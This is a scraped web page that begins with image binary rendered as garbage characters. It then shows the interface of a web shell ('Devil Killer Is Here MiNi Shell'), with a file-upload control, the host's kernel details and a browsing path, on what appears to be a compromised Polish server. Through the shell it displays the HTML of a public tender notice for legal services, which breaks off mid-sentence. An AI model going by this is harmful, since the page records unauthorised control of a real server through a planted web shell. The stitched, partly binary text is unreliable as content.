JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250325/0016074501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Obsługa prawna w zakresie transakcji finansowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">AGENCJA ROZWOJU PRZEMYSŁU SPÓŁKA AKCYJNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 006746410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowy Świat 6/12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@arp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://arp.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Sprawy gospodarcze i finansowe</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Obsługa prawna w zakresie transakcji finansowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3078bc6c-3616-4025-8156-468694b6fc13</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00160745</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zakupy.arp.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zakupy.arp.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest wyłącznie w języku polskim.<br/>2. Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy Zakupowej Marketplanet OnePlace<br/>https://zakupy.arp.pl/app/login<br/>3. Szczegółowe informacje dotyczące korzystania z ww. Platformy Zakupowej, procesu zakładania konta i logowania się zostały zawarte w instrukcji udostępnionej na platformie w zakładce: „Regulacje i procedury procesu zakupowego”.<br/>4.Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w aktach wykonawczych do ustawy Pzp.<br/>5.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu, opisane zostały w Instrukcji korzystania dla Wykonawców. Instrukcja jest udostępniona na Platformie Zakupowej.<br/>6.Za datę przekazania oferty, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na Platformę Zakupową oraz na pocztę elektroniczną.<br/>7.Informacje dotyczące odpowiedniego przygotowania stanowiska dostępne są na:<br/>https://oneplace.marketplanet.pl/przygotujstanowiskopcwykonujac-ponizsze-kroki<br/>8.Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą Platformy Zakupowej tel. +48 22 257 22 23 (infolinia dostępna w dni robocze, w godz. 9:00-17:00), mail: oneplace@marketplanet.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje podano w Rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje podano w Rozdziale XVIII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BAZ.263.6.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie obsługi prawnej na rzecz Zamawiającego przy transakcjach finansowych, których przedmiotem jest nabycie lub zbycie: akcji i udziałów w spółkach prawa handlowego, nieruchomości, przedsiębiorstwa spółki, poszczególnych składników majątkowych lub zorganizowanej części przedsiębiorstwa, certyfikatów inwestycyjnych funduszy lub utworzenie (zawiązanie) spółki w okresie obowiązywania umowy ramowej, zwanej dalej „umową” lub „umową ramową”. <br/>2.	Przedmiot zamówienia realizowany będzie m.in. w poniżej wskazanych formach:<br/>1)	przeprowadzenia prawnego badania due diligence; <br/>2)	przygotowywania opinii i informacji prawnych; <br/>3)	udziału w negocjacjach, w innych spotkaniach wewnętrznych i zewnętrznych, posiedzeniach organów korporacyjnych – w związku z realizacją zamówienia przez Wykonawcę; <br/>4)	sporządzenia projektów dokumentów transakcyjnych, w szczególności: umów, aneksów, porozumień, listów intencyjnych/term sheetów, warunków emisji i propozycji nabycia certyfikatów inwestycyjnych, dokumentacji zabezpieczeń, propozycji scenariuszy działań prawnych i struktury transakcji; <br/>5)	przeprowadzenia czynności materialno-technicznych związanych z zamknięciem transakcji, w tym organizacja closingu; <br/>6)	przygotowania projektów uchwał organów korporacyjnych. <br/>Wszystkie zlecenia wykonywane będą po uprzednim uzgodnieniu zakresu usługi.<br/>3.	Wszelkie opracowania pisemne, a w szczególności opinie i informacje prawne, ekspertyzy, analizy prawne, projekty dokumentów itp., muszą być sporządzone i podpisane przez radcę prawnego lub adwokata lub prawnika zagranicznego skierowanego do realizacji Zamówienia.<br/>4.	Zamawiający zawrze umowę ramową z maksymalnie 3 Wykonawcami, przy czym:<br/>1)	Zamawiający zaprosi do zawarcia Umowy Ramowej Wykonawców, którzy nie podlegają wykluczeniu z postępowania, spełniają warunki udziału w postępowaniu oraz uzyskają najwyższą liczbę punktów w ramach kryterium oceny ofert, z zastrzeżeniem pkt 2 poniżej;<br/>2)	jeżeli liczba Wykonawców, którzy nie podlegają wykluczeniu z postępowania oraz spełniają warunki udziału w postępowaniu wyniesie 3 lub mniej, Zamawiający zaprosi do zawarcia Umowy Ramowej wszystkich Wykonawców, odstępując od badania kryterium oceny ofert, z zastrzeżeniem art. 258 ust. 4 ustawy Pzp, zgodnie z którym postępowanie będzie mogło zostać unieważnione jeżeli wpłyną mniej niż dwie oferty;<br/>3)	jeżeli liczba Wykonawców, którzy uzyskają taką samą liczbę punktów w rankingu ofert na ostatnim miejscu będzie większa niż jeden, co nie pozwoli Zamawiającemu wyłonić 3 Wykonawców o największej liczbie punktów w kryterium oceny ofert, wówczas Zamawiający zawrze Umowę Ramową ze wszystkimi Wykonawcami, którzy uzyskali tożsamą liczbę punktów, co Wykonawca uplasowany na 3 miejscu.<br/>5.	Szczegółowy opis oraz warunki realizacji przedmiotu zamówienia określono we wzorze umowy - załącznik nr 2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79100000-5 - Usługi prawnicze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującym kryteriami: <br/>P = C + D<br/>gdzie:<br/>P – ostateczna liczba punktów przyznanych badanej ofercie,<br/>C – liczba punktów przyznanych badanej ofercie w kryterium „Cena brutto za jedną godzinę”,<br/>D - liczba punktów przyznanych badanej ofercie w kryterium „Kwalifikacje i doświadczenie osób skierowanych do realizacji zamówienia”.<br/>Wykonawca maksymalnie może uzyskać 100 pkt.<br/>2.	Poniżej Zamawiający przedstawia szczegółowy sposób oceny ofert pod względem następujących kryteriów:<br/>1)	cena brutto za jedną godzinę („C”) - waga kryterium 40% (40 pkt)<br/>W kryterium tym zostanie zastosowany wzór:<br/>C = (najniższa cena brutto za jedną godzinę / cena brutto za jedną godzinę badanej oferty) x 40)<br/>2)	Kwalifikacje i doświadczenie osób skierowanych do realizacji zamówienia („D”) - waga kryterium 60% (60 pkt).<br/>D = (liczba punktów zdobytych przez ocenianego wykonawcę / maksymalna liczba punktów do zdobycia [90] ) x 60<br/>gdzie:<br/>„liczba punktów zdobytych przez ocenianego wykonawcę” zostanie obliczona przez dodanie punktów wszystkich osób i podzielenie tej sumy przez liczbę osób wskazanych przez Wykonawcę. <br/>Zamawiający za skierowanie osób do realizacji przedmiotowego zamówienia posiadających doświadczenie w sprawach z zakresu realizacji projektów transakcyjnych o wysokim stopniu złożoności przyzna punkty w następujący sposób – w kryterium można otrzymać maksymalnie 90 pkt przez łącznie wszystkie osoby, oceniane będzie doświadczenie maksymalnie 4 osób:<br/>a)	za doświadczenie w doradztwie prawnym, świadczonym w ostatnich 10 latach, w procesie fuzji lub przejęcia przedsiębiorstwa (w tym zorganizowanej części przedsiębiorstwa) z siedzibą na terenie Polski, którego przychody (liczone samodzielnie dla tego przedsiębiorstwa lub przychody skonsolidowane tego przedsiębiorcy i jego podmiotów zależnych) w roku poprzedzającym rok realizacji tego zlecenia przez Wykonawcę, przekraczały 50 mln złotych, na rzecz spółki kapitałowej z większościowym udziałem Skarbu Państwa – 5 pkt za każdą transakcję, ale łącznie nie więcej niż 15 pkt;<br/>b)	za doświadczenie w doradztwie prawnym, świadczonym w ostatnich 10 latach, w procesie fuzji lub przejęcia przedsiębiorstwa (w tym zorganizowanej części przedsiębiorstwa) z siedzibą na terenie Polski, którego przychody (liczone samodzielnie dla tego przedsiębiorstwa lub przychody skonsolidowane tego przedsiębiorcy i jego podmiotów zależnych) w roku poprzedzającym rok realizacji tego zlecenia przez Wykonawcę, przekraczały 150 mln zł – 5 pkt za każdą transakcję, ale łącznie nie więcej niż 30 pkt;<br/>c)	za doświadczenie w doradztwie prawnym, świadczonym w ostatnich 10 latach, w procesie fuzji lub przejęcia przedsiębiorstwa (w tym zorganizowanej części przedsiębiorstwa) z siedzibą na terenie Polski, którego przychody (liczone samodzielnie dla tego przedsiębiorstwa lub przychody skonsolidowane tego przedsiębiorcy i jego podmiotów zależnych) w roku poprzedzającym rok realizacji tego zlecenia przez Wykonawcę, przekraczały 50 mln zł, przy czym dominujący przedmiot działalności przedsiębiorstwa, które było przedmiotem transakcji, dotyczył jednej z następujących branż: przemysł ciężki, produkcja, energetyka (z wyłączeniem OZE), branża zbrojeniowa, przemysł stoczniowy – 5 pkt za każdą transakcję, ale łącznie nie więcej niż 30 pkt;<br/>d)	liczba przeprowadzonych w latach 2022-2024 badań due diligence prawnych dla podmiotu którego przychody (liczone samodzielnie dla tego przedsiębiorstwa lub przychody skonsolidowane tego przedsiębiorcy i jego podmiotów zależnych) w roku poprzedzającym rok realizacji tego zlecenia przez Wykonawcę, przekraczały 50 mln złotych – 3 pkt za każde badanie, ale łącznie nie więcej niż 15 pkt.<br/>Zamawiający dopuszcza aby osoby wskazane w kryterium oceny ofert były również wskazane na potwierdzenie spełnienia warunku udziału w postępowaniu, określonym w Rozdziale VI SWZ.<br/>cd. opisu kryteriów oceny ofert - zamieszczone zostały w Sekcji IX - Pozostałych informacjach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje i doświadczenie osób skierowanych do realizacji zamówienia („D”)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	W postępowaniu może brać udział Wykonawca, który spełnia warunki udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej. <br/>1)	Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie co najmniej 10 zleceń polegających na realizacji procesu prawnego due diligence w procesie fuzji lub przejęcia przedsiębiorstwa (w tym zorganizowanej części przedsiębiorstwa) z siedzibą na terenie Polski, którego przychody (liczone samodzielnie dla tego przedsiębiorstwa lub przychody skonsolidowane tego przedsiębiorcy i jego podmiotów zależnych) w roku poprzedzającym rok realizacji tego zlecenia przez Wykonawcę, przekraczały 50 mln złotych, każde;<br/>2)	Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie co najmniej 10 zleceń polegających na doradztwie prawnym w procesie fuzji lub przejęcia przedsiębiorstwa (w tym zorganizowanej części przedsiębiorstwa) z siedzibą na terenie Polski, którego przychody (liczone samodzielnie dla tego przedsiębiorstwa lub przychody skonsolidowane tego przedsiębiorcy i jego podmiotów zależnych) w roku poprzedzającym rok realizacji tego zlecenia przez Wykonawcę, przekraczały 50 mln złotych, każde;<br/>3)	Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie co najmniej 3 zlecenia polegające na doradztwie prawnym w procesie sprzedaży nieruchomości, znajdującej się na terenie Polski, której wartość rynkowa przekraczała 50 mln złotych, każde;<br/>4)	Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie co najmniej 2 zlecenia polegające na doradztwie prawnym w procesie emisji lub sprzedaży certyfikatów inwestycyjnych, których wartość przekraczała 20 mln złotych, każde;<br/>5)	Wykonawca musi wykazać, że skieruje do realizacji zamówienia co najmniej 2 osoby o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnych do prawidłowej realizacji zamówienia, z czego każda z osób musi:<br/>a)	posiadać uprawnienia adwokata lub radcy prawnego lub też prawnika zagranicznego w rozumieniu ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej;<br/>b)	posiadać łącznie minimum 10 letnie doświadczenie uzyskane w doradztwie prawnym w zakresie fuzji i przejęć przedsiębiorców z siedzibą w Polsce;<br/>c)	biegle posługiwać się językiem polskim oraz językiem angielskim w mowie i piśmie na poziomie odpowiadającym C1;<br/>6)	Wykonawca musi wykazać, że skieruje do realizacji zamówienia co najmniej 2 osoby o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnych do prawidłowej realizacji zamówienia, z czego każda z osób musi:<br/>a)	posiadać uprawnienia adwokata lub radcy prawnego lub też prawnika zagranicznego w rozumieniu ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej;<br/>b)	posiadać łącznie minimum 6 letnie doświadczenie uzyskane w doradztwie prawnym w zakresie fuzji i przejęć przedsiębiorców z siedzibą w Polsce;<br/>c)	biegle posługiwać się językiem polskim oraz językiem angielskim w mowie i piśmie na poziomie odpowiadającym C1;<br/>7)	Wykonawca musi wykazać, że skieruje do realizacji zamówienia co najmniej 1 osobę o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnych do prawidłowej realizacji zamówienia, która: <br/>a)	posiadać uprawnienia adwokata lub radcy prawnego lub też prawnika zagranicznego w rozumieniu ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej<br/>b)	posiadać łącznie minimum 6 letnie doświadczenie uzyskane w doradztwie prawnym w zakresie obrotu nieruchomościami w Polsce;<br/>c)	biegle posługiwać się językiem polskim oraz językiem angielskim w mowie i piśmie na poziomie odpowiadającym C1;<br/>8)	Wykonawca musi wykazać, że skieruje do realizacji zamówienia co najmniej 1 osobę o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnych do prawidłowej realizacji zamówienia, która: <br/>a)	posiadać uprawnienia adwokata lub radcy prawnego lub też prawnika zagranicznego w rozumieniu ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej;<br/>b)	posiadać łącznie minimum 6 letnie doświadczenie uzyskane w doradztwie prawnym w zakresie emisji lub nabywania certyfikatów inwestycyjnych w Polsce;<br/>c)	biegle posługiwać się językiem polskim oraz językiem angielskim w mowie i piśmie na poziomie odpowiadającym C1.<br/>Zamawiający uzna warunek wskazany w ust. 1 pkt 5)- 8) za spełniony, jeżeli Wykonawca wykaże, że do realizacji zamówienia skieruje min. 4 osoby, z czego wskaże co najmniej:<br/>	2 osoby o kwalifikacjach wskazanych w pkt 5 oraz <br/>	2 osoby o kwalifikacjach, o których mowa w pkt 6, przy czym muszą to być inne osoby niż wykazane w pkt 5.<br/>Natomiast kwalifikacje osób z punktu 7 mogą się łączyć z kwalifikacjami osób z punktów 5, 6 oraz 8, a kwalifikacje osób z punktu 8 mogą się łączyć z kwalifikacjami osób z punktów 5, 6 oraz 7.<br/>Uwaga! Zamawiający wyjaśnia, że przez wyrażenia: <br/>▪	„doradztwo prawne” rozumie się świadczenie pomocy prawnej w rozumieniu art. 2 ustawy o radcach prawnych oraz art. 1 ust. 1 ustawy Prawo o adwokaturze, obejmujące czynności związane bezpośrednio z daną transakcją, w szczególności negocjowanie i sporządzanie dokumentów transakcyjnych (np. umowy sprzedaż udziałów);<br/>▪	„proces prawny due diligence” rozumie się analizę prawną podmiotu będącego przedmiotem potencjalnej (przyszłej) transakcji, którego celem jest identyfikacja dla inwestora (nabywcy) ewentualnych ryzyk prawnych związanych z przedmiotem transakcji; obejmuje to także analizę w zakresie formy i struktury przyszłej transakcji, uwzględniając identyfikację czynności, których podjęcie będzie konieczne dla skutecznego dokonania transakcji, jak np. uzyskanie właściwych zgód;<br/>▪	„fuzja przedsiębiorstwa” rozumie się połączenie, zgodnie z art. 491 KSH, co najmniej dwóch, autonomicznych (tj. niepowiązanych ze sobą) podmiotów;<br/>▪	„przejęcie przedsiębiorstwa” rozumie się nabycie co najmniej 50 % akcji lub udziałów w spółce kapitałowej, a także sprzedaż przedsiębiorstwa lub zorganizowanej części przedsiębiorstwa. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie będzie żądał podmiotowych 